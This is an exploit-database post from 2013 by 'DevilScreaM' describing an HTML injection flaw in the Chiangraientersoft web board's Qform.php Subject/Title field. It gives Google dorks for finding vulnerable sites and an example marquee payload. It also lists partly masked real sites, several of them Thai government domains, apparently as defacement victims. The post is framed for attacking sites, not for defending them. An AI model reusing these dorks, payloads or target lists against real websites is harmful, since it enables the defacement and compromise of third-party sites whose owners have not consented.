Home / exploits Chiangraientersoft HTML Injection
Posted on 08 October 2013
#Exploit Title : Chiangraientersoft HTML Injection #Author : DevilScreaM #Date : 05/10/2013 #Category : Web Applications #Vendor : http://chiangraientersoft.com/ #Dork inurl:Qread.php?id_ques= inurl:webboard/Qread.php?id_ques= #Vulnerability : HTML Injection #Tested On : Windows 7, Ubuntu (Mozila & Chrome) #Greetz : Newbie-Security.or.id, Banjarmasin Hacker, Borneo Hacker, Muslim Hacker HTML Injection Vulnerable at 'Qform.php' at Field Subject/Title *Exploit & POC http://site-target/[PATH]/Qform.php At Subject/Title, Input Your HTML, Example HTML <marquee><font color=Blue size=32>DevilScreaM</font></marquee> Example Deface with HTML Injection http://bandXi.go.th/webboard/index.php http://tumbXoltasai.go.th/webboard/index.php http://dongXada.go.th/webboard/index.php http://phayaXktobchawa.com/webboard/index.php http://nungXaman.com/board/index.php http://friendXnter.com/webboard/index.php http://baannXawadee.com/board/index.php
